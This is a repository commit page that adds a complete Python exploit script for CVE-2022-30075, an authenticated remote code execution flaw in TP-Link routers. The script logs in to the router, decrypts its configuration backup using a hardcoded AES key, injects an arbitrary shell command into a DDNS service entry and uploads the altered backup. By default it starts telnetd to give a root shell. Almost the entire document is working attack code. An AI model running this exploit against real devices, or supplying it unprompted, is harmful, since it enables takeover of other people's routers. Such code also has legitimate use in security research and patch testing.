Projects STRLCPY CVE-2022-30075 Commits 32a52ea3
🤬
  • ■ ■ ■ ■ ■ ■
    tplink.py
     1 +#!/usr/bin/python3
     2 +# Exploit Title: TP-Link Routers - Authenticated Remote Code Execution
     3 +# Exploit Author: Tomas Melicher
     4 +# Technical Details: https://github.com/aaronsvk/CVE-2022-30075
     5 +# Date: 2022-06-08
     6 +# Vendor Homepage: https://www.tp-link.com/
     7 +# Tested On: Tp-Link Archer AX50
     8 +# Vulnerability Description:
     9 +# Remote Code Execution via importing malicious config file
     10 + 
     11 +import argparse # pip install argparse
     12 +import requests # pip install requests
     13 +import binascii, base64, os, re, json, sys, time, math, random, hashlib
     14 +import tarfile, zlib
     15 +from Crypto.Cipher import AES, PKCS1_v1_5, PKCS1_OAEP # pip install pycryptodome
     16 +from Crypto.PublicKey import RSA
     17 +from Crypto.Util.Padding import pad, unpad
     18 +from Crypto.Random import get_random_bytes
     19 +from urllib.parse import urlencode
     20 + 
     21 +class WebClient(object):
     22 + 
     23 + def __init__(self, target, password):
     24 + self.target = target
     25 + self.password = password.encode('utf-8')
     26 + self.password_hash = hashlib.md5(('admin%s'%password).encode('utf-8')).hexdigest().encode('utf-8')
     27 + self.aes_key = (str(time.time()) + str(random.random())).replace('.','')[0:AES.block_size].encode('utf-8')
     28 + self.aes_iv = (str(time.time()) + str(random.random())).replace('.','')[0:AES.block_size].encode('utf-8')
     29 + 
     30 + self.stok = ''
     31 + self.session = requests.Session()
     32 + 
     33 + data = self.basic_request('/login?form=auth', {'operation':'read'})
     34 + if data['success'] != True:
     35 + print('[!] unsupported router')
     36 + return
     37 + self.sign_rsa_n = int(data['data']['key'][0], 16)
     38 + self.sign_rsa_e = int(data['data']['key'][1], 16)
     39 + self.seq = data['data']['seq']
     40 + 
     41 + data = self.basic_request('/login?form=keys', {'operation':'read'})
     42 + self.password_rsa_n = int(data['data']['password'][0], 16)
     43 + self.password_rsa_e = int(data['data']['password'][1], 16)
     44 + 
     45 + self.stok = self.login()
     46 + 
     47 + 
     48 + def aes_encrypt(self, aes_key, aes_iv, aes_block_size, plaintext):
     49 + cipher = AES.new(aes_key, AES.MODE_CBC, iv=aes_iv)
     50 + plaintext_padded = pad(plaintext, aes_block_size)
     51 + return cipher.encrypt(plaintext_padded)
     52 + 
     53 + 
     54 + def aes_decrypt(self, aes_key, aes_iv, aes_block_size, ciphertext):
     55 + cipher = AES.new(aes_key, AES.MODE_CBC, iv=aes_iv)
     56 + plaintext_padded = cipher.decrypt(ciphertext)
     57 + plaintext = unpad(plaintext_padded, aes_block_size)
     58 + return plaintext
     59 + 
     60 + 
     61 + def rsa_encrypt(self, n, e, plaintext):
     62 + public_key = RSA.construct((n, e)).publickey()
     63 + encryptor = PKCS1_v1_5.new(public_key)
     64 + block_size = int(public_key.n.bit_length()/8) - 11
     65 + encrypted_text = ''
     66 + for i in range(0, len(plaintext), block_size):
     67 + encrypted_text += encryptor.encrypt(plaintext[i:i+block_size]).hex()
     68 + return encrypted_text
     69 + 
     70 + 
     71 + def download_request(self, url, post_data):
     72 + res = self.session.post('http://%s/cgi-bin/luci/;stok=%s%s'%(self.target,self.stok,url), data=post_data, stream=True)
     73 + filepath = os.getcwd()+'/'+re.findall(r'(?<=filename=")[^"]+', res.headers['Content-Disposition'])[0]
     74 + if os.path.exists(filepath):
     75 + print('[!] can\'t download, file "%s" already exists' % filepath)
     76 + return
     77 + with open(filepath, 'wb') as f:
     78 + for chunk in res.iter_content(chunk_size=4096):
     79 + f.write(chunk)
     80 + return filepath
     81 + 
     82 + 
     83 + def basic_request(self, url, post_data, files_data={}):
     84 + res = self.session.post('http://%s/cgi-bin/luci/;stok=%s%s'%(self.target,self.stok,url), data=post_data, files=files_data)
     85 + return json.loads(res.content)
     86 + 
     87 + 
     88 + def encrypted_request(self, url, post_data):
     89 + serialized_data = urlencode(post_data)
     90 + encrypted_data = self.aes_encrypt(self.aes_key, self.aes_iv, AES.block_size, serialized_data.encode('utf-8'))
     91 + encrypted_data = base64.b64encode(encrypted_data)
     92 + 
     93 + signature = ('k=%s&i=%s&h=%s&s=%d'.encode('utf-8')) % (self.aes_key, self.aes_iv, self.password_hash, self.seq+len(encrypted_data))
     94 + encrypted_signature = self.rsa_encrypt(self.sign_rsa_n, self.sign_rsa_e, signature)
     95 + 
     96 + res = self.session.post('http://%s/cgi-bin/luci/;stok=%s%s'%(self.target,self.stok,url), data={'sign':encrypted_signature, 'data':encrypted_data}) # order of params is important
     97 + if(res.status_code != 200):
     98 + print('[!] url "%s" returned unexpected status code'%(url))
     99 + return
     100 + encrypted_data = json.loads(res.content)
     101 + encrypted_data = base64.b64decode(encrypted_data['data'])
     102 + data = self.aes_decrypt(self.aes_key, self.aes_iv, AES.block_size, encrypted_data)
     103 + return json.loads(data)
     104 + 
     105 + 
     106 + def login(self):
     107 + post_data = {'operation':'login', 'password':self.rsa_encrypt(self.password_rsa_n, self.password_rsa_e, self.password)}
     108 + data = self.encrypted_request('/login?form=login', post_data)
     109 + if data['success'] != True:
     110 + print('[!] login failed')
     111 + return
     112 + print('[+] logged in, received token (stok): %s'%(data['data']['stok']))
     113 + return data['data']['stok']
     114 + 
     115 + 
     116 + 
     117 +class BackupParser(object):
     118 + 
     119 + def __init__(self, filepath):
     120 + self.encrypted_path = os.path.abspath(filepath)
     121 + self.decrypted_path = os.path.splitext(filepath)[0]
     122 + 
     123 + self.aes_key = bytes.fromhex('2EB38F7EC41D4B8E1422805BCD5F740BC3B95BE163E39D67579EB344427F7836') # strings ./squashfs-root/usr/lib/lua/luci/model/crypto.lua
     124 + self.iv = bytes.fromhex('360028C9064242F81074F4C127D299F6') # strings ./squashfs-root/usr/lib/lua/luci/model/crypto.lua
     125 + 
     126 + 
     127 + def aes_encrypt(self, aes_key, aes_iv, aes_block_size, plaintext):
     128 + cipher = AES.new(aes_key, AES.MODE_CBC, iv=aes_iv)
     129 + plaintext_padded = pad(plaintext, aes_block_size)
     130 + return cipher.encrypt(plaintext_padded)
     131 + 
     132 + 
     133 + def aes_decrypt(self, aes_key, aes_iv, aes_block_size, ciphertext):
     134 + cipher = AES.new(aes_key, AES.MODE_CBC, iv=aes_iv)
     135 + plaintext_padded = cipher.decrypt(ciphertext)
     136 + plaintext = unpad(plaintext_padded, aes_block_size)
     137 + return plaintext
     138 + 
     139 + 
     140 + def encrypt_config(self):
     141 + if not os.path.isdir(self.decrypted_path):
     142 + print('[!] invalid directory "%s"'%(self.decrypted_path))
     143 + return
     144 + 
     145 + # encrypt, compress each .xml using zlib and add them to tar archive
     146 + with tarfile.open('%s/data.tar'%(self.decrypted_path), 'w') as tar:
     147 + for filename in os.listdir(self.decrypted_path):
     148 + basename,ext = os.path.splitext(filename)
     149 + if ext == '.xml':
     150 + xml_path = '%s/%s'%(self.decrypted_path,filename)
     151 + bin_path = '%s/%s.bin'%(self.decrypted_path,basename)
     152 + with open(xml_path, 'rb') as f:
     153 + plaintext = f.read()
     154 + if len(plaintext) == 0:
     155 + f = open(bin_path, 'w')
     156 + f.close()
     157 + else:
     158 + compressed = zlib.compress(plaintext)
     159 + encrypted = self.aes_encrypt(self.aes_key, self.iv, AES.block_size, compressed)
     160 + with open(bin_path, 'wb') as f:
     161 + f.write(encrypted)
     162 + tar.add(bin_path, os.path.basename(bin_path))
     163 + os.unlink(bin_path)
     164 + # compress tar archive using zlib and encrypt
     165 + with open('%s/md5_sum'%(self.decrypted_path), 'rb') as f1, open('%s/data.tar'%(self.decrypted_path), 'rb') as f2:
     166 + compressed = zlib.compress(f1.read()+f2.read())
     167 + encrypted = self.aes_encrypt(self.aes_key, self.iv, AES.block_size, compressed)
     168 + # write into final config file
     169 + with open('%s'%(self.encrypted_path), 'wb') as f:
     170 + f.write(encrypted)
     171 + os.unlink('%s/data.tar'%(self.decrypted_path))
     172 + 
     173 + 
     174 + def decrypt_config(self):
     175 + if not os.path.isfile(self.encrypted_path):
     176 + print('[!] invalid file "%s"'%(self.encrypted_path))
     177 + return
     178 + 
     179 + # decrypt and decompress config file
     180 + with open(self.encrypted_path, 'rb') as f:
     181 + decrypted = self.aes_decrypt(self.aes_key, self.iv, AES.block_size, f.read())
     182 + decompressed = zlib.decompress(decrypted)
     183 + os.mkdir(self.decrypted_path)
     184 + # store decrypted data into files
     185 + with open('%s/md5_sum'%(self.decrypted_path), 'wb') as f:
     186 + f.write(decompressed[0:16])
     187 + with open('%s/data.tar'%(self.decrypted_path), 'wb') as f:
     188 + f.write(decompressed[16:])
     189 + # untar second part of decrypted data
     190 + with tarfile.open('%s/data.tar'%(self.decrypted_path), 'r') as tar:
     191 + tar.extractall(path=self.decrypted_path)
     192 + # decrypt and decompress each .bin file from tar archive
     193 + for filename in os.listdir(self.decrypted_path):
     194 + basename,ext = os.path.splitext(filename)
     195 + if ext == '.bin':
     196 + bin_path = '%s/%s'%(self.decrypted_path,filename)
     197 + xml_path = '%s/%s.xml'%(self.decrypted_path,basename)
     198 + with open(bin_path, 'rb') as f:
     199 + ciphertext = f.read()
     200 + os.unlink(bin_path)
     201 + if len(ciphertext) == 0:
     202 + f = open(xml_path, 'w')
     203 + f.close()
     204 + continue
     205 + decrypted = self.aes_decrypt(self.aes_key, self.iv, AES.block_size, ciphertext)
     206 + decompressed = zlib.decompress(decrypted)
     207 + with open(xml_path, 'wb') as f:
     208 + f.write(decompressed)
     209 + os.unlink('%s/data.tar'%(self.decrypted_path))
     210 + 
     211 + 
     212 + def modify_config(self, command):
     213 + xml_path = '%s/ori-backup-user-config.xml'%(self.decrypted_path)
     214 + if not os.path.isfile(xml_path):
     215 + print('[!] invalid file "%s"'%(xml_path))
     216 + return
     217 + 
     218 + with open(xml_path, 'r') as f:
     219 + xml_content = f.read()
     220 + 
     221 + # https://openwrt.org/docs/guide-user/services/ddns/client#detecting_wan_ip_with_script
     222 + payload = '<service name="exploit">\n'
     223 + payload += '<enabled>on</enabled>\n'
     224 + payload += '<update_url>http://127.0.0.1/</update_url>\n'
     225 + payload += '<domain>x.example.org</domain>\n'
     226 + payload += '<username>X</username>\n'
     227 + payload += '<password>X</password>\n'
     228 + payload += '<ip_source>script</ip_source>\n'
     229 + payload += '<ip_script>%s</ip_script>\n' % (command.replace('<','&lt;').replace('&','&amp;'))
     230 + payload += '<interface>internet</interface>\n' # not worked for other interfaces
     231 + payload += '<retry_interval>5</retry_interval>\n'
     232 + payload += '<retry_unit>seconds</retry_unit>\n'
     233 + payload += '<retry_times>3</retry_times>\n'
     234 + payload += '<check_interval>12</check_interval>\n'
     235 + payload += '<check_unit>hours</check_unit>\n'
     236 + payload += '<force_interval>30</force_interval>\n'
     237 + payload += '<force_unit>days</force_unit>\n'
     238 + payload += '</service>\n'
     239 + 
     240 + if '<service name="exploit">' in xml_content:
     241 + xml_content = re.sub(r'<service name="exploit">[\s\S]+?</service>\n</ddns>', '%s</ddns>'%(payload), xml_content, 1)
     242 + else:
     243 + xml_content = xml_content.replace('</service>\n</ddns>', '</service>\n%s</ddns>'%(payload), 1)
     244 + with open(xml_path, 'w') as f:
     245 + f.write(xml_content)
     246 + 
     247 + 
     248 + 
     249 +arg_parser = argparse.ArgumentParser()
     250 +arg_parser.add_argument('-t', metavar='target', help='ip address of tp-link router', required=True)
     251 +arg_parser.add_argument('-p', metavar='password', required=True)
     252 +arg_parser.add_argument('-b', action='store_true', help='only backup and decrypt config')
     253 +arg_parser.add_argument('-r', metavar='backup_directory', help='only encrypt and restore directory with decrypted config')
     254 +arg_parser.add_argument('-c', metavar='cmd', default='/usr/sbin/telnetd -l /bin/login.sh', help='command to execute')
     255 +args = arg_parser.parse_args()
     256 + 
     257 +client = WebClient(args.t, args.p)
     258 +parser = None
     259 + 
     260 +if not args.r:
     261 + print('[*] downloading config file ...')
     262 + filepath = client.download_request('/admin/firmware?form=config_multipart', {'operation':'backup'})
     263 + if not filepath:
     264 + sys.exit(-1)
     265 + 
     266 + print('[*] decrypting config file "%s" ...'%(filepath))
     267 + parser = BackupParser(filepath)
     268 + parser.decrypt_config()
     269 + print('[+] successfully decrypted into directory "%s"'%(parser.decrypted_path))
     270 + 
     271 +if not args.b and not args.r:
     272 + filepath = '%s_modified'%(parser.decrypted_path)
     273 + os.rename(parser.decrypted_path, filepath)
     274 + parser.decrypted_path = os.path.abspath(filepath)
     275 + parser.encrypted_path = '%s.bin'%(filepath)
     276 + parser.modify_config(args.c)
     277 + print('[+] modified directory with decrypted config "%s" ...'%(parser.decrypted_path))
     278 + 
     279 +if not args.b:
     280 + if parser is None:
     281 + parser = BackupParser('%s.bin'%(args.r.rstrip('/')))
     282 + print('[*] encrypting directory with modified config "%s" ...'%(parser.decrypted_path))
     283 + parser.encrypt_config()
     284 + data = client.basic_request('/admin/firmware?form=config_multipart', {'operation':'read'})
     285 + timeout = data['data']['totaltime'] if data['success'] else 180
     286 + print('[*] uploading modified config file "%s"'%(parser.encrypted_path))
     287 + data = client.basic_request('/admin/firmware?form=config_multipart', {'operation':'restore'}, {'archive':open(parser.encrypted_path,'rb')})
     288 + if not data['success']:
     289 + print('[!] unexpected response')
     290 + print(data)
     291 + sys.exit(-1)
     292 + 
     293 + print('[+] config file successfully uploaded')
     294 + print('[*] router will reboot in few seconds... when it becomes online again (few minutes), try "telnet %s" and enjoy root shell !!!'%(args.t))
     295 + 
Please wait...
Page is in error, reload to recover